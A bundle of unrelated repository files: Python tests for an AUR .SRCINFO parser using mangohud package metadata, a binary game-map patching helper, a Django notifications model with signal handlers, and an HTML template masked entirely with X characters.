with open(FILE_DIR + '/resources/mangohud_srcinfo') as f:
srcinfo = f.read()
res = aur.map_srcinfo(srcinfo, 'mangohud-common')
self.assertEqual(len(expected_fields), len(res), "Expected: {}. Current: {}".format(len(expected_fields), len(res)))
for key, val in expected_fields.items():
self.assertIn(key, res, "key '{}' not in res".format(key))
if isinstance(val, list):
val.sort()
if isinstance(res[key], list):
res[key].sort()
self.assertEqual(val, res[key], "expected: {}. current: {}".format(val, res[key]))
def test_map_srcinfo__several_pkgnames__pkgname_specified_case_3(self):
expected_fields = {
'pkgbase': 'mangohud',
'pkgname': 'lib32-mangohud',
'pkgver': '0.5.1',
'pkgrel': '3',
'pkgdesc': 'A Vulkan overlay layer for monitoring FPS, temperatures, CPU/GPU load and more (32-bit)',
'source': ['mangohud-0.5.1.tar.gz::https://github.com/flightlessmango/MangoHud/archive/v0.5.1.tar.gz'],
'sha256sums': ['3e91d4fc7369d46763894c13f3315133871dd02705072981770c3cf58e8081c6'],
'license': 'MIT',
'url': 'https://github.com/flightlessmango/MangoHud',
'arch': 'x86_64',
'makedepends': [
'glslang', 'libglvnd', 'lib32-libglvnd', 'meson', 'python-mako', 'vulkan-headers', 'vulkan-icd-loader',
'lib32-vulkan-icd-loader', 'libxnvctrl'
],
'depends': ['mangohud', 'mangohud-common', 'lib32-gcc-libs'],
'optdepends': ['lib32-libxnvctrl: support for older NVIDIA GPUs']
}
with open(FILE_DIR + '/resources/mangohud_srcinfo') as f:
srcinfo = f.read()
res = aur.map_srcinfo(srcinfo, 'lib32-mangohud')
self.assertEqual(len(expected_fields), len(res), "Expected: {}. Current: {}".format(len(expected_fields), len(res)))
for key, val in expected_fields.items():
self.assertIn(key, res, "key '{}' not in res".format(key))
if isinstance(val, list):
val.sort()
if isinstance(res[key], list):
res[key].sort()
self.assertEqual(val, res[key], "expected: {}. current: {}".format(val, res[key]))
def test_map_srcinfo__several_pkgnames__different_pkgname(self):
expected_fields = {
'pkgbase': 'mangohud',
'pkgname': ['lib32-mangohud', 'mangohud', 'mangohud-common'],
'pkgver': '0.5.1',
'pkgrel': '3',
'pkgdesc': [
'A Vulkan overlay layer for monitoring FPS, temperatures, CPU/GPU load and more (32-bit)',
'Common files for mangohud and lib32-mangohud',
'A Vulkan overlay layer for monitoring FPS, temperatures, CPU/GPU load and more',
],
'source': ['mangohud-0.5.1.tar.gz::https://github.com/flightlessmango/MangoHud/archive/v0.5.1.tar.gz'],
'sha256sums': ['3e91d4fc7369d46763894c13f3315133871dd02705072981770c3cf58e8081c6'],
'license': 'MIT',
'url': 'https://github.com/flightlessmango/MangoHud',
'arch': 'x86_64',
'makedepends': [
'glslang', 'libglvnd', 'lib32-libglvnd', 'meson', 'python-mako', 'vulkan-headers', 'vulkan-icd-loader',
'lib32-vulkan-icd-loader', 'libxnvctrl'
],
'depends': ['mangohud', 'mangohud-common', 'lib32-gcc-libs', 'gcc-libs'],
'optdepends': ['lib32-libxnvctrl: support for older NVIDIA GPUs',
'bash: mangohud helper script',
'libxnvctrl: support for older NVIDIA GPUs']
}
with open(FILE_DIR + '/resources/mangohud_srcinfo') as f:
srcinfo = f.read()
res = aur.map_srcinfo(srcinfo, 'xpto')
self.assertEqual(len(expected_fields), len(res), "Expected: {}. Current: {}".format(len(expected_fields), len(res)))
for key, val in expected_fields.items():
self.assertIn(key, res, "key '{}' not in res".format(key))
if isinstance(val, list):
val.sort()
if isinstance(res[key], list):
res[key].sort()
self.assertEqual(val, res[key], "expected: {}. current: {}".format(val, res[key]))
def test_map_srcinfo__several_names__pkgname_present__only_specific_fields(self):
expected_fields = {
'pkgver': '0.5.1',
'pkgrel': '3'
}
with open(FILE_DIR + '/resources/mangohud_srcinfo') as f:
srcinfo = f.read()
res = aur.map_srcinfo(srcinfo, 'mangohud-commons', fields={*expected_fields.keys()})
self.assertEqual(len(expected_fields), len(res), "Expected: {}. Current: {}".format(len(expected_fields), len(res)))
for key, val in expected_fields.items():
self.assertIn(key, res, "key '{}' not in res".format(key))
if isinstance(val, list):
val.sort()
res[key].sort()
self.assertEqual(val, res[key], "expected: {}. current: {}".format(val, res[key]))
def test_map_srcinfo__several_names__pkgname_not_present__only_specific_fields(self):
expected_fields = {
'pkgname': ['mangohud', 'lib32-mangohud', 'mangohud-common'],
'pkgver': '0.5.1'
}
with open(FILE_DIR + '/resources/mangohud_srcinfo') as f:
srcinfo = f.read()
res = aur.map_srcinfo(srcinfo, 'xpto', fields={*expected_fields.keys()})
self.assertEqual(len(expected_fields), len(res), "Expected: {}. Current: {}".format(len(expected_fields), len(res)))
for key, val in expected_fields.items():
self.assertIn(key, res, "key '{}' not in res".format(key))
if isinstance(val, list):
val.sort()
res[key].sort()
self.assertEqual(val, res[key], "expected: {}. current: {}".format(val, res[key]))
|
<filename>legacy/map_helper.py
import struct
#DEBUG VARS
map_name = 'ca20.map.auto'
OBJECT_IND = 0
PRIM_IND = 1
VB_INDEX = 0
VERTS_ADDED = 6
VERT_LEN = 0xC0
ORIG_IB_LEN = 0x159C8
NEW_IB_LEN = 0x159DA
IB_DIF = NEW_IB_LEN - ORIG_IB_LEN
INDEXES_ADDED = IB_DIF // 2
def main():
with open('%s' % map_name, 'rb+') as f:
object_offsets = get_object_offsets(f)
update_object(f, object_offsets[OBJECT_IND])
def get_object_offsets(f):
object_offsets = []
f.read(4)
map_len = f.read(0x4)
map_len = struct.unpack('<I', map_len)[0]
print(f'MAP LEN:\t\t0x{map_len:X}')
map_len += VERT_LEN + IB_DIF
f.seek(-4, 1)
f.write(struct.pack('<I', map_len))
#UPDATE VALUE HERE
f.read(0xC) #ignore irrelevant data for now
tex_section_len = f.read(4)
tex_section_len = struct.unpack('<I', tex_section_len)[0]
f.read(8)
f.seek(tex_section_len, 1)
f.read(4)
section_len = f.read(4)
section_len = struct.unpack('<I', section_len)[0]
print(f'SECTION LEN:\t\t0x{section_len:X}')
section_len += VERT_LEN + IB_DIF
f.seek(-4, 1)
f.write(struct.pack('<I', section_len))
#UPDATE VALUE HERE
f.read(0xC) # discad geom section header and creation date
object_count = f.read(4)
object_count = struct.unpack('<I', object_count)[0]
sub_section_len = f.read(4)
sub_section_len = struct.unpack('<I', sub_section_len)[0]
print(f'SUBSECTION LEN:\t0x{sub_section_len:X}')
sub_section_len += VERT_LEN + IB_DIF
f.seek(-4, 1)
f.write(struct.pack('<I', sub_section_len))
#UPDATE VALUE HERE
f.read(4)
while(object_count > 0):
object_start = f.tell()
f.read(4)
object_len = f.read(4)
object_len = struct.unpack('<I', object_len)[0]
object_offsets.append(object_start)
f.seek(object_start + object_len)
object_count -= 1
#return objOffsetList
return [object_offsets[0], object_offsets[1], object_offsets[3]]
def update_object(f, off):
vb_offsets = []
f.seek(off)
f.read(4)
object_len = f.read(4)
object_len = struct.unpack('<I', object_len)[0]
print(f'OBJECT LEN:\t\t0x{object_len:X}')
object_len += VERT_LEN + IB_DIF
f.seek(-4, 1)
f.write(struct.pack('<I', object_len))
# UPDATE VALUE HERE
f.read(4)
unk_len_0 = f.read(4)
unk_len_0 = struct.unpack('<I', unk_len_0)[0]
print(f'UNK0 LEN:\t\t0x{unk_len_0:X}')
if(unk_len_0 != 0): # Only non-zero in streamed maps
unk_len_0 += VERT_LEN + IB_DIF
f.seek(-4, 1)
f.write(struct.pack('<I', unk_len_0))
# UPDATE VALUE HERE
unk_len_1 = f.read(4)
unk_len_1 = struct.unpack('<I', unk_len_1)[0]
print(f'UNK1 len:\t\t0x{unk_len_1:X}')
unk_len_1 += VERT_LEN + IB_DIF
f.seek(-4, 1)
f.write(struct.pack('<I', unk_len_1))
# UPDATE VALUE HERE
f.read(4)
bounding_volume_len = f.read(4)
bounding_volume_len = struct.unpack('<I', bounding_volume_len)[0]
f.read(bounding_volume_len * 4) # ignore occlusion culling volume
f.read(4) # ignore whatever this is
index_buf_ptr = f.read(4)
index_buf_ptr = struct.unpack('<I', index_buf_ptr)[0]
print(f'INDEX BUF POINTER:\t0x{index_buf_ptr:X}')
index_buf_ptr += VERT_LEN
f.seek(-4, 1)
f.write(struct.pack('<I', index_buf_ptr))
# UPDATE VALUE HERE
index_buf_len = f.read(4)
index_buf_len = struct.unpack('<I', index_buf_len)[0]
print(f'INDEX BUF LEN:\t\t0x{index_buf_len:X}')
index_buf_len += IB_DIF
f.seek(-4, 1)
f.write(struct.pack('<I', index_buf_len))
# UPDATE VALUE HERE
unk_len_2 = f.read(4)
unk_len_2 = struct.unpack('<I', unk_len_2)[0]
print(f'UNK2 LEN:\t\t0x{unk_len_2:X}')
unk_len_2 += VERT_LEN + IB_DIF
f.seek(-4, 1)
f.write(struct.pack('<I', unk_len_2))
#UPDATE VALUE HERE
primitive_list = get_primitives(f)
unk_len_3 = f.read(4)
unk_len_3 = struct.unpack('<I', unk_len_3)[0]
print(f'UNK3 LEN:\t\t0x{unk_len_3:X}')
unk_len_3 += VERT_LEN
f.seek(-4, 1)
f.write(struct.pack('<I', unk_len_3))
#UPDATE VALUE HERE
vb_count = f.read(4)
vb_count = struct.unpack('<I', vb_count)[0]
vb_info_list = []
for vb in range(0, vb_count):
if(vb >= VB_INDEX): # SHOULD REALLY GET THE VB INDEX PROGRAMATICALLY
vb_start = f.read(4)
vb_start = struct.unpack('<I', vb_start)[0]
print(f'VERTBUF START:\t\t0x{vb_start:X}')
if(vb > VB_INDEX):
vb_start += VERT_LEN
f.seek(-4,1)
f.write(struct.pack('<I', vb_start))
#UPDATE VALUE HERE (NOT NECESSARY FOR HP190)
f.read(4) #discard stride
vb_len = f.read(4)
vb_len = struct.unpack('<I', vb_len)[0]
print(f'VERTBUF LEN:\t\t0x{vb_len:X}')
vb_len += VERT_LEN
f.seek(-4,1)
f.write(struct.pack('<I', vb_len))
#UPDATE VALUE HERE
else:
f.read(12) # skip vertex buffer
def get_primitives(f):
print()
object_count = f.read(4)
object_count = struct.unpack('<I', object_count)[0]
primitives = []
for o in range(0, object_count):
if(o >= PRIM_IND):
f.read(0xC)
primitive_count = f.read(2)
primitive_count = struct.unpack('<H', primitive_count)[0]
print(f'P{o} PRIM COUNT:\t\t0x{primitive_count:X}')
if(o == PRIM_IND):
primitive_count += INDEXES_ADDED
f.seek(-2,1)
f.write(struct.pack('<H', primitive_count))
#UPDATE VALUE HERE
f.read(2)
vert_start = f.read(2)
vert_start = struct.unpack('<H', vert_start)[0]
print(f'P{o} VERT START:\t\t0x{vert_start:X}')
if(o > PRIM_IND):
vert_start += VERTS_ADDED
f.seek(-2,1)
f.write(struct.pack('<H', vert_start))
#UPDATE VALUE HERE
vert_end = f.read(2)
vert_end = struct.unpack('<H', vert_end)[0]
print(f'P{o} VERT END:\t\t0x{vert_end:X}')
vert_end += VERTS_ADDED
f.seek(-2,1)
f.write(struct.pack('<H', vert_end))
#UPDATE VALUE HERE
else:
f.read(0x14) # Not interested, skip
return primitives
if __name__ == '__main__':
main()
|
<gh_stars>1-10
from django.db import models
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from multiselectfield import MultiSelectField
from django_countries.fields import CountryField
from apps.profiles.models import UserType, UserCreatedGroup, UserProfile
from crum import get_current_user
from django.db.models.signals import post_save, m2m_changed
from datetime import datetime, timedelta
from apps.reports.models import Report, OnlineReport
from apps.filesharing.models import SharedFile, SharedFolder
from apps.events.models import Event
class Notification(models.Model):
creator = models.ForeignKey('profiles.UserProfile', blank=True, null=True, related_name="notifications_created", on_delete=models.CASCADE)
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
recipient_occupational_groups = MultiSelectField(choices=UserType.choices, max_length=4*len(UserType.choices))
recipient_countries = CountryField(multiple=True, blank=True, default='')
recipient_users = models.ManyToManyField('profiles.UserProfile', blank=True, related_name="notifications_received")
recipient_orgs = models.ManyToManyField('profiles.OrganizationGroup', blank=True, related_name="notifications_received")
viewed_by = models.ManyToManyField('profiles.UserProfile', blank=True, related_name="notifications_viewed")
timestamp = models.DateTimeField(default=datetime.now)
def save(self, *args, **kwargs):
current_user = get_current_user()
if current_user.is_authenticated:
self.creator = get_current_user().profile
self.timestamp = datetime.now()
super(Notification, self).save(*args, **kwargs)
def register_viewer(self):
current_user = get_current_user()
current_user_profile = current_user.profile
self.viewed_by.add(current_user_profile)
def unregister_viewer(self):
current_user = get_current_user()
current_user_profile = current_user.profile
self.viewed_by.remove(current_user_profile)
def user_can_view(self):
current_user = get_current_user()
current_user_profile = current_user.profile
current_user_country = current_user_profile.country
current_user_org = current_user.primary_org
current_user_type = current_user_profile.type
return (current_user_profile in self.recipient_users or not self.recipient_users.exists())\
and (current_user_country in self.recipient_countries or self.recipient_countries == "")\
and (current_user_org in self.recipient_orgs or not self.recipient_orgs.exists())\
and (current_user_type in self.recipient_occupational_groups or self.recipient_occupational_groups == "")
def __str__(self):
if self.content_type == ContentType.objects.get_for_model(Report):
if self.content_object:
return "New report: {} activity in {}".format(self.content_object.get_category_display(), self.content_object.country.name)
else:
return "New report: (report was deleted - no longer accessible)"
elif self.content_type == ContentType.objects.get_for_model(OnlineReport):
if self.content_object:
return "New online activity report: {}".format(self.content_object.get_category_display())
else:
return "New online report: (online report was deleted - no longer accessible)"
elif self.content_type == ContentType.objects.get_for_model(SharedFile):
if self.content_object:
return "A file was shared with you: {}".format(self.content_object.file.name.split('/')[-1])
else:
return "A file was shared with you: {}".format("(deleted by now - no longer accessible)")
elif self.content_type == ContentType.objects.get_for_model(SharedFolder):
if self.content_object:
return "A folder was shared with you: {}".format(self.content_object.name)
else:
return "A folder was shared with you: {}".format("(deleted by now - no longer accessible)")
elif self.content_type == ContentType.objects.get_for_model(UserCreatedGroup):
if self.content_object:
return "A change in status in the group {}".format(self.content_object.display_name)
else:
return "A change in status in the group {}".format("(deleted by now - no longer accessible)")
elif self.content_type == ContentType.objects.get_for_model(Event):
if self.content_object:
return "Invitation to event \"{}\" on {}".format(self.content_object.title, self.content_object.datetime_start)
else:
return "A change in status in the event {}".format("(deleted by now - no longer accessible)")
else:
return "New {}".format(self.content_type.model)
def generate_report_notification(sender, instance, **kwargs):
if not kwargs['created'] and instance.read_only: # checking for read_only makes sure we generate notifications only on finalization
content_type = ContentType.objects.get_for_model(sender)
object_id = instance.id
recipient_countries = ''
recipient_occupational_groups = (UserType.JRN.value, UserType.ACA.value, UserType.NGO.value, UserType.LAW.value, UserType.GOV.value, UserType.IGO.value)
if sender is Report:
recipient_countries = instance.country
new_notification = Notification(content_type=content_type, object_id=object_id, recipient_countries=recipient_countries, recipient_occupational_groups=recipient_occupational_groups)
new_notification.save()
def generate_file_or_folder_notification(sender, instance, **kwargs):
content_type = ContentType.objects.get_for_model(sender)
object_id = instance.id
recipient_users = instance.users_read.all() | instance.users_write.all()
recipient_orgs = instance.orgs_read.all() | instance.orgs_write.all()
current_user_profile = get_current_user().profile
if not recipient_users and not recipient_orgs: # no recipients at all, do not generate notification
return
fifteen_mins_ago = datetime.now() - timedelta(minutes=15)
potential_duplicate = None
if sender == SharedFile:
potential_duplicate = Notification.objects.filter(object_id=object_id, content_type=content_type, timestamp__gte=fifteen_mins_ago, creator=current_user_profile).first()
if sender == SharedFolder:
potential_duplicate = Notification.objects.filter(object_id=object_id, content_type=content_type, timestamp__gte=fifteen_mins_ago, creator=current_user_profile).first()
if not potential_duplicate:
new_notification = Notification(content_type=content_type, object_id=object_id)
new_notification.save()
new_notification.recipient_users.set(recipient_users)
new_notification.recipient_orgs.set(recipient_orgs)
else:
potential_duplicate.timestamp = datetime.now()
potential_duplicate.recipient_users.set(recipient_users)
potential_duplicate.recipient_orgs.set(recipient_orgs)
potential_duplicate.save()
# TODO filter for duplicate content type and object ID within sliding time window
def notify_new_share_targets_of_file_or_folder(sender, instance, **kwargs):
print("Called: {}".format('notify_new_share_targets_of_file_or_folder'))
pk_set = kwargs['pk_set']
current_user_profile = get_current_user().profile
object_id = instance.id
content_type_file = ContentType.objects.get_for_model(SharedFile)
content_type_folder = ContentType.objects.get_for_model(SharedFolder)
if kwargs['action'] == "post_add":
fifteen_mins_ago = datetime.now() - timedelta(minutes=15)
potential_duplicate = None
if sender == SharedFile.users_read.through or sender == SharedFile.users_write.through or sender == SharedFile.orgs_read.through or sender == SharedFile.orgs_write.through:
potential_duplicate = Notification.objects.filter(object_id=object_id, content_type=content_type_file, timestamp__gte=fifteen_mins_ago, creator=current_user_profile).first()
if sender == SharedFolder.users_read.through or sender == SharedFolder.users_write.through or sender == SharedFolder.orgs_read.through or sender == SharedFolder.orgs_write.through:
potential_duplicate = Notification.objects.filter(object_id=object_id, content_type=content_type_folder, timestamp__gte=fifteen_mins_ago, creator=current_user_profile).first()
if sender == SharedFile.users_read.through or sender == SharedFile.users_write.through:
if potential_duplicate:
potential_duplicate.recipient_users.add(*pk_set)
potential_duplicate.timestamp = datetime.now()
potential_duplicate.save()
else:
new_notification = Notification(content_type=content_type_file, object_id=object_id)
new_notification.save()
new_notification.recipient_users.set(pk_set)
elif sender == SharedFile.orgs_read.through or sender == SharedFile.orgs_write.through:
if potential_duplicate:
potential_duplicate.recipient_orgs.add(*pk_set)
potential_duplicate.timestamp = datetime.now()
potential_duplicate.save()
else:
new_notification = Notification(content_type=content_type_file, object_id=object_id)
new_notification.save()
new_notification.recipient_orgs.set(pk_set)
elif sender == SharedFolder.users_read.through or sender == SharedFolder.users_write.through:
if potential_duplicate:
potential_duplicate.recipient_users.add(*pk_set)
potential_duplicate.timestamp = datetime.now()
potential_duplicate.save()
else:
new_notification = Notification(content_type=content_type_folder, object_id=object_id)
new_notification.save()
new_notification.recipient_users.set(pk_set)
elif sender == SharedFolder.orgs_read.through or sender == SharedFolder.orgs_write.through:
if potential_duplicate:
potential_duplicate.recipient_orgs.add(*pk_set)
potential_duplicate.timestamp = datetime.now()
potential_duplicate.save()
else:
new_notification = Notification(content_type=content_type_folder, object_id=object_id)
new_notification.save()
new_notification.recipient_orgs.set(pk_set)
post_save.connect(generate_report_notification, sender=Report, dispatch_uid="apps.notifications.models")
post_save.connect(generate_report_notification, sender=OnlineReport, dispatch_uid="apps.notifications.models")
post_save.connect(generate_file_or_folder_notification, sender=SharedFile, dispatch_uid="apps.notifications.models")
post_save.connect(generate_file_or_folder_notification, sender=SharedFolder, dispatch_uid="apps.notifications.models")
m2m_changed.connect(notify_new_share_targets_of_file_or_folder, sender=SharedFile.users_read.through, dispatch_uid="apps.notifications.models")
m2m_changed.connect(notify_new_share_targets_of_file_or_folder, sender=SharedFile.users_write.through, dispatch_uid="apps.notifications.models")
m2m_changed.connect(notify_new_share_targets_of_file_or_folder, sender=SharedFile.orgs_read.through, dispatch_uid="apps.notifications.models")
m2m_changed.connect(notify_new_share_targets_of_file_or_folder, sender=SharedFile.orgs_write.through, dispatch_uid="apps.notifications.models")
m2m_changed.connect(notify_new_share_targets_of_file_or_folder, sender=SharedFolder.users_read.through, dispatch_uid="apps.notifications.models")
m2m_changed.connect(notify_new_share_targets_of_file_or_folder, sender=SharedFolder.users_write.through, dispatch_uid="apps.notifications.models")
m2m_changed.connect(notify_new_share_targets_of_file_or_folder, sender=SharedFolder.orgs_read.through, dispatch_uid="apps.notifications.models")
m2m_changed.connect(notify_new_share_targets_of_file_or_folder, sender=SharedFolder.orgs_write.through, dispatch_uid="apps.notifications.models")
|
<reponame>hmabubakar313/admin_panel_theme
XXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXX
XXXXXXXXXXX
XXXXXXXXXX
XXXXXXXXX
XXXXXXXX
XXXXXXXX
XXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXX
XXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXX
XXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
